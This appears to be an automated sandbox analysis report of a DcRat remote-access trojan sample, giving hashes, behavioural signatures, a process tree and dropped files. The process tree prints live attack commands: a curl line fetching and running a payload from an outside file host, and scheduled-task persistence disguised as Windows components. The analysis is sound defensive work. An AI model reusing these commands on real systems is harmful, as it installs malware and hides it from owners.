Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-01-2025 05:36

General

  • Target

    private.exe

  • Size

    854KB

  • MD5

    53e14b277744d3c61cffb17f39ede98d

  • SHA1

    c8482d3ec8cb10df2d9f660920ab5d839d6e450f

  • SHA256

    f8b5a7f99a109c3bc007a3ef1e6fbbacbb0fae70951c3b020704df3106a54654

  • SHA512

    140dffe4e715ccaeec37ae3da9734c0fbd2b6b1e4337d75621dc8714ec13ab572cc2ee5885a1ec196758637f27ac50ff3970396db5c20885234a4a2e1e47c8fb

  • SSDEEP

    12288:Hnt46d+ktbUluYV/YH7Fso6veRSN2ff+zOe9egX7AlGq+nqnIr9BqiXb1FP:Hnt46Qi4ue/Do60OegX7Aoq+nmm7Vj

Malware Config

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Dcrat family
  • Process spawned unexpected child process 18 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 16 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Modifies registry class 15 IoCs
  • Runs ping.exe 1 TTPs 10 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\private.exe
    "C:\Users\Admin\AppData\Local\Temp\private.exe"
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3204
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c cls
      2⤵
        PID:5060
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:368
        • C:\Windows\system32\curl.exe
          curl --silent https://file.garden/Z01XJyuAz2yPo4d4/client.bin --output C:\Windows\Speech\client.exe
          3⤵
          • Drops file in Windows directory
          PID:3592
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c C:\Windows\Speech\client.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2984
        • C:\Windows\Speech\client.exe
          C:\Windows\Speech\client.exe
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:1232
          • C:\Windows\SysWOW64\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe"
            4⤵
            • Checks computer location settings
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2596
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat" "
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:5084
              • C:\ComponentCrt\chainreviewwinrefSvc.exe
                "C:\ComponentCrt/chainreviewwinrefSvc.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in Program Files directory
                • Drops file in Windows directory
                • Modifies registry class
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:5108
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\Pj8vQuwPyQ.bat"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:4900
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    8⤵
                      PID:4868
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      8⤵
                        PID:2212
                      • C:\ComponentCrt\chainreviewwinrefSvc.exe
                        "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                        8⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Modifies registry class
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2308
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WHqdBEPCKu.bat"
                          9⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3688
                          • C:\Windows\system32\chcp.com
                            chcp 65001
                            10⤵
                              PID:672
                            • C:\Windows\system32\PING.EXE
                              ping -n 10 localhost
                              10⤵
                              • System Network Configuration Discovery: Internet Connection Discovery
                              • Runs ping.exe
                              PID:4620
                            • C:\ComponentCrt\chainreviewwinrefSvc.exe
                              "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                              10⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              • Modifies registry class
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:2984
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5CZTOTC2vN.bat"
                                11⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2416
                                • C:\Windows\system32\chcp.com
                                  chcp 65001
                                  12⤵
                                    PID:2948
                                  • C:\Windows\system32\PING.EXE
                                    ping -n 10 localhost
                                    12⤵
                                    • System Network Configuration Discovery: Internet Connection Discovery
                                    • Runs ping.exe
                                    PID:1132
                                  • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                    "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                    12⤵
                                    • Checks computer location settings
                                    • Executes dropped EXE
                                    • Modifies registry class
                                    • Suspicious use of AdjustPrivilegeToken
                                    • Suspicious use of WriteProcessMemory
                                    PID:2988
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\o1vNVowh3C.bat"
                                      13⤵
                                      • Suspicious use of WriteProcessMemory
                                      PID:2040
                                      • C:\Windows\system32\chcp.com
                                        chcp 65001
                                        14⤵
                                          PID:1756
                                        • C:\Windows\system32\PING.EXE
                                          ping -n 10 localhost
                                          14⤵
                                          • System Network Configuration Discovery: Internet Connection Discovery
                                          • Runs ping.exe
                                          PID:964
                                        • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                          "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                          14⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          • Modifies registry class
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:3380
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\kJRy2Wx8TR.bat"
                                            15⤵
                                            • Suspicious use of WriteProcessMemory
                                            PID:4608
                                            • C:\Windows\system32\chcp.com
                                              chcp 65001
                                              16⤵
                                                PID:3040
                                              • C:\Windows\system32\w32tm.exe
                                                w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                16⤵
                                                  PID:3676
                                                • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                                  "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                                  16⤵
                                                  • Checks computer location settings
                                                  • Executes dropped EXE
                                                  • Modifies registry class
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:1724
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XA2Giq7lse.bat"
                                                    17⤵
                                                      PID:2036
                                                      • C:\Windows\system32\chcp.com
                                                        chcp 65001
                                                        18⤵
                                                          PID:4892
                                                        • C:\Windows\system32\PING.EXE
                                                          ping -n 10 localhost
                                                          18⤵
                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                          • Runs ping.exe
                                                          PID:4448
                                                        • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                                          "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                                          18⤵
                                                          • Checks computer location settings
                                                          • Executes dropped EXE
                                                          • Modifies registry class
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:4128
                                                          • C:\Windows\System32\cmd.exe
                                                            "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\XVflfzP3Wp.bat"
                                                            19⤵
                                                              PID:1012
                                                              • C:\Windows\system32\chcp.com
                                                                chcp 65001
                                                                20⤵
                                                                  PID:3288
                                                                • C:\Windows\system32\w32tm.exe
                                                                  w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                  20⤵
                                                                    PID:5060
                                                                  • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                                                    "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                                                    20⤵
                                                                    • Checks computer location settings
                                                                    • Executes dropped EXE
                                                                    • Modifies registry class
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:624
                                                                    • C:\Windows\System32\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lYG6WIxzfM.bat"
                                                                      21⤵
                                                                        PID:1832
                                                                        • C:\Windows\system32\chcp.com
                                                                          chcp 65001
                                                                          22⤵
                                                                            PID:4524
                                                                          • C:\Windows\system32\PING.EXE
                                                                            ping -n 10 localhost
                                                                            22⤵
                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                            • Runs ping.exe
                                                                            PID:3604
                                                                          • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                                                            "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                                                            22⤵
                                                                            • Checks computer location settings
                                                                            • Executes dropped EXE
                                                                            • Modifies registry class
                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                            PID:976
                                                                            • C:\Windows\System32\cmd.exe
                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5CZTOTC2vN.bat"
                                                                              23⤵
                                                                                PID:4920
                                                                                • C:\Windows\system32\chcp.com
                                                                                  chcp 65001
                                                                                  24⤵
                                                                                    PID:2492
                                                                                  • C:\Windows\system32\PING.EXE
                                                                                    ping -n 10 localhost
                                                                                    24⤵
                                                                                    • System Network Configuration Discovery: Internet Connection Discovery
                                                                                    • Runs ping.exe
                                                                                    PID:1768
                                                                                  • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                                                                    "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                                                                    24⤵
                                                                                    • Checks computer location settings
                                                                                    • Executes dropped EXE
                                                                                    • Modifies registry class
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:2984
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\usSWzSdfMb.bat"
                                                                                      25⤵
                                                                                        PID:3532
                                                                                        • C:\Windows\system32\chcp.com
                                                                                          chcp 65001
                                                                                          26⤵
                                                                                            PID:1436
                                                                                          • C:\Windows\system32\PING.EXE
                                                                                            ping -n 10 localhost
                                                                                            26⤵
                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                            • Runs ping.exe
                                                                                            PID:844
                                                                                          • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                                                                            "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                                                                            26⤵
                                                                                            • Checks computer location settings
                                                                                            • Executes dropped EXE
                                                                                            • Modifies registry class
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:1968
                                                                                            • C:\Windows\System32\cmd.exe
                                                                                              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7gEkM0BkJD.bat"
                                                                                              27⤵
                                                                                                PID:1692
                                                                                                • C:\Windows\system32\chcp.com
                                                                                                  chcp 65001
                                                                                                  28⤵
                                                                                                    PID:528
                                                                                                  • C:\Windows\system32\w32tm.exe
                                                                                                    w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                                                                                                    28⤵
                                                                                                      PID:1640
                                                                                                    • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                                                                                      "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                                                                                      28⤵
                                                                                                      • Checks computer location settings
                                                                                                      • Executes dropped EXE
                                                                                                      • Modifies registry class
                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                      PID:1256
                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\nSTk4tfYD6.bat"
                                                                                                        29⤵
                                                                                                          PID:4348
                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                            chcp 65001
                                                                                                            30⤵
                                                                                                              PID:2168
                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                              ping -n 10 localhost
                                                                                                              30⤵
                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                              • Runs ping.exe
                                                                                                              PID:4316
                                                                                                            • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                                                                                              "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                                                                                              30⤵
                                                                                                              • Checks computer location settings
                                                                                                              • Executes dropped EXE
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              PID:1864
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\mm6E03wqrH.bat"
                                                                                                                31⤵
                                                                                                                  PID:3864
                                                                                                                  • C:\Windows\system32\chcp.com
                                                                                                                    chcp 65001
                                                                                                                    32⤵
                                                                                                                      PID:2196
                                                                                                                    • C:\Windows\system32\PING.EXE
                                                                                                                      ping -n 10 localhost
                                                                                                                      32⤵
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:1148
                                                                                                                    • C:\ComponentCrt\chainreviewwinrefSvc.exe
                                                                                                                      "C:\ComponentCrt\chainreviewwinrefSvc.exe"
                                                                                                                      32⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Modifies registry class
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:3784
                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6RObsEBt7I.bat"
                                                                                                                        33⤵
                                                                                                                          PID:4128
                                                                                                                          • C:\Windows\system32\chcp.com
                                                                                                                            chcp 65001
                                                                                                                            34⤵
                                                                                                                              PID:4368
                                                                                                                            • C:\Windows\system32\PING.EXE
                                                                                                                              ping -n 10 localhost
                                                                                                                              34⤵
                                                                                                                              • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                              • Runs ping.exe
                                                                                                                              PID:2828
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c del C:\Windows\Speech\client.exe
                                                              2⤵
                                                                PID:2492
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 9 /tr "'C:\Windows\InputMethod\CHT\MoUsoCoreWorker.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:3056
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "MoUsoCoreWorker" /sc ONLOGON /tr "'C:\Windows\InputMethod\CHT\MoUsoCoreWorker.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:1236
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "MoUsoCoreWorkerM" /sc MINUTE /mo 11 /tr "'C:\Windows\InputMethod\CHT\MoUsoCoreWorker.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:4124
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 8 /tr "'C:\ComponentCrt\StartMenuExperienceHost.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:528
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\ComponentCrt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:3332
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\ComponentCrt\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:760
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Idle.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:2408
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Idle.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:2704
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Sidebar\Shared Gadgets\Idle.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:1256
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:4348
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:2424
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:4464
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 13 /tr "'C:\Users\Admin\StartMenuExperienceHost.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:3028
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Users\Admin\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:3388
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\StartMenuExperienceHost.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:1564
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 12 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:836
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "chainreviewwinrefSvc" /sc ONLOGON /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:3384
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks.exe /create /tn "chainreviewwinrefSvcc" /sc MINUTE /mo 9 /tr "'C:\ComponentCrt\chainreviewwinrefSvc.exe'" /rl HIGHEST /f
                                                              1⤵
                                                              • Process spawned unexpected child process
                                                              • Scheduled Task/Job: Scheduled Task
                                                              PID:4636

                                                            Network

                                                            MITRE ATT&CK Enterprise v15

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads

                                                            • C:\ComponentCrt\1lvoZv4qBcC2Me4L.bat

                                                              Filesize

                                                              98B

                                                              MD5

                                                              4dafd9e9509ac96be6aa5baec659da4d

                                                              SHA1

                                                              a091552663ddea89536560f232b8339f318c9cbc

                                                              SHA256

                                                              0c53b640295abd25e8387957941e29f5c4e765376365409164ac39e3365a6ccf

                                                              SHA512

                                                              d290c162347e236e0e197c52afc4f4b33f1eba2498dfe2ad86c414c87ab70c9fbbd2132cd08bfb4137e8555a095ca9acb6675727a4a5f65ccc46141c16698132

                                                            • C:\ComponentCrt\chainreviewwinrefSvc.exe

                                                              Filesize

                                                              1.8MB

                                                              MD5

                                                              11cca9e2c6dc9c2a728b89e7314ec26a

                                                              SHA1

                                                              58aec3b662a1c4e8b43cc454d90813ac89b5e612

                                                              SHA256

                                                              300072795259e7b2baa69a7a3d19ffea1844dffc391e710c654aa1b66b0e2197

                                                              SHA512

                                                              fb1fcff1c94e73b1227f65b237639e25604d614cfe365f2108bbbfdb489b97410fdc17411b8f00fc5b8f57d51080b4496010537a6a4ff9b15b7bdd24f89d0df7

                                                            • C:\ComponentCrt\sBEZl9whlNx1coUjXXPbcOghFKEeD7haTOPQzUr4aUDA.vbe

                                                              Filesize

                                                              207B

                                                              MD5

                                                              b292d233456b16f26abc1aa07c9f5de0

                                                              SHA1

                                                              7b025705136101b5618d81d8ebf472335eebde43

                                                              SHA256

                                                              e75d13d4b079fafbd413fa8182c270f1f0f41b1b19b3469db12de226fed67b2d

                                                              SHA512

                                                              1c9c3846ab0e392dc6833de2a9238c91b6042b5095521196a3ceae8830edf7fb6d73118ed023b2e2daf287a48084fa8ee40241248a231cf668d5cc5e8f947ee4

                                                            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\chainreviewwinrefSvc.exe.log

                                                              Filesize

                                                              1KB

                                                              MD5

                                                              af6acd95d59de87c04642509c30e81c1

                                                              SHA1

                                                              f9549ae93fdb0a5861a79a08f60aa81c4b32377b

                                                              SHA256

                                                              7521ee2d065a78efcab55a194fbd78492f84b70595f139263875f4ea92b194d6

                                                              SHA512

                                                              93ab99bcf588fde553de3240e0d2b0cbd4e4bc5ef5e99d53f45a267d7ff30103a80b5a7aa1c52d6eff1e070af0ec82d2c0b8aafb7099742aa16810edc1815c3a

                                                            • C:\Users\Admin\AppData\Local\Temp\5CZTOTC2vN.bat

                                                              Filesize

                                                              168B

                                                              MD5

                                                              811bf9eebedf563d2e9820add1ea17e9

                                                              SHA1

                                                              87cfe6ecaed35b211994fcd0e70a75e925f03d35

                                                              SHA256

                                                              0a5770dae8ce79280ce277d1701320c0b1136adecd5dfe68a75d64c415fc109e

                                                              SHA512

                                                              ec8dcfeab065eea18b821c39b30bf93da73aafde27f31e06a2b9c2437a030bd89b2bf2f7bcd406b532f0189a44a7f8deae5be3f43e758f39cb0794ee0e5e8760

                                                            • C:\Users\Admin\AppData\Local\Temp\6RObsEBt7I.bat

                                                              Filesize

                                                              168B

                                                              MD5

                                                              4744074e9576965011ceffc14c561730

                                                              SHA1

                                                              35029e395fbd57320420582c98bf6528dcc6fbb7

                                                              SHA256

                                                              11ce3a705a248e15b45d8685040a0f181a8cb6da9935d61df84235b1e1faf2b5

                                                              SHA512

                                                              beaa381d9e96b3a18bae6d53355c3c92d1763828bb086c8f84965a4042a49d8ed0b7a82cd98ee8bd63897c7d715798b083638d475a760a59f8a940faedafe0fe

                                                            • C:\Users\Admin\AppData\Local\Temp\7gEkM0BkJD.bat

                                                              Filesize

                                                              216B

                                                              MD5

                                                              eddbd1129ac924580b318c3d067c610d

                                                              SHA1

                                                              e167ca303bc4c62c0b7ad38f52f02ccee2fbc1ab

                                                              SHA256

                                                              bd3a006b9d4e37cc548f7a3fd636ebf04e647816b2427a26414bdbcafe4731e8

                                                              SHA512

                                                              a4f17d93be96903c37e3936c92813b3fdd5f06efa6482bc330cebbbf8feae955ca1bb63d5552bee2b7b199ec553ea94b377c26c23ea587e1c7a2f93920a5df9c

                                                            • C:\Users\Admin\AppData\Local\Temp\Pj8vQuwPyQ.bat

                                                              Filesize

                                                              216B

                                                              MD5

                                                              99accb2a3c8dbda16e3997c5ba824e57

                                                              SHA1

                                                              1594e71a8282714f88f4b83234c32d5ed5aab1c8

                                                              SHA256

                                                              67aab689a45ad20517e8d568bc958c675919be0b8ea886ecf75d19f80eb48092

                                                              SHA512

                                                              b0f9225e47138398fdf30dfb536e893a618021393f20a8262fc2007eb99bbe7181d51e938390d494d39f53a6cf800601d560831d790516d5dbb0a83240812aa0

                                                            • C:\Users\Admin\AppData\Local\Temp\WHqdBEPCKu.bat

                                                              Filesize

                                                              168B

                                                              MD5

                                                              af82a342bf67dbdb9c850dce58305cbc

                                                              SHA1

                                                              e8a677bc6ae62d3647e5f04fbff9fa4e3fe37997

                                                              SHA256

                                                              6308e811611a3ec56b1187af2ed3bc96929e443b51c4b216f62fd64e3e44cc55

                                                              SHA512

                                                              a5c38f833f34bb8a52bb2d68ff01e94e3484d1f4ff2dba92ae5793d505c54efa6e2d542e0fd50c8e2f2f711b1da4516d63e405f60b5c9b530e39c9593874fa57

                                                            • C:\Users\Admin\AppData\Local\Temp\XVflfzP3Wp.bat

                                                              Filesize

                                                              216B

                                                              MD5

                                                              ce4a037611babe6a1559cfab797219a5

                                                              SHA1

                                                              fe4a0f711761a09a0f95cd719cf4bc53dbfeb16b

                                                              SHA256

                                                              5bb3ec44d1eaf197bbc45d2c4110f917bab4227f7088bf38ddccb374fb3659d8

                                                              SHA512

                                                              47ad971777734d6be5cc8980f802d8d1c883dc88bbaaf21eec71b46c86b8a412a00e2202739488f282f89e6726ebf72de526758e5faca67e6401dac224d80bba

                                                            • C:\Users\Admin\AppData\Local\Temp\kJRy2Wx8TR.bat

                                                              Filesize

                                                              216B

                                                              MD5

                                                              c1cba29b776e81f2b8368f5fd8af33d5

                                                              SHA1

                                                              bcc89998cc38a55dda0933813c0852ca26ad6f94

                                                              SHA256

                                                              39c8ea54814f93e07039f175d3d50102980f8fdceac89f55f4922290ce3e314b

                                                              SHA512

                                                              900dcca616cd59fb5817cc1904be0e1a10695b29d34cdc8815bba1a54e1411e208b1a3011be79c2f54ccfff37fcd00991500169d88253daba3e4d6c385df8afc

                                                            • C:\Users\Admin\AppData\Local\Temp\lYG6WIxzfM.bat

                                                              Filesize

                                                              168B

                                                              MD5

                                                              6fda3b98f38b7a731119865f9808fd27

                                                              SHA1

                                                              0b0ecd4ebe0131ea77bf4182319e2cad2335df77

                                                              SHA256

                                                              1e89fd3865c21bd07d738457c11020cd1edde596065260ef923f8fb2d4507d44

                                                              SHA512

                                                              a9ffd5cc2947854e6118cdf4fe357dbc7348c961ce97bbfe660736dc4e969c9481e37be578dfdbbe21bc77c53238512fae87359d88a66405962d018ecd9c6891

                                                            • C:\Users\Admin\AppData\Local\Temp\mm6E03wqrH.bat

                                                              Filesize

                                                              168B

                                                              MD5

                                                              a188c920af68c342a0ad4f8f6ac31394

                                                              SHA1

                                                              08dedcc3919383bb35ba119218b26b065520c6b2

                                                              SHA256

                                                              e1c43318902d4475a5e91e245cc6420b972c0ad33bfb0ab42a6e9a58efd65e78

                                                              SHA512

                                                              8f143415b9bb947fc6106efcc300a1b40e35b812bf2ac7368332b542130e4041de01575024e7c12342111ab146366cf5c3bdb7d890cddc0037e642bde4d9e8ba

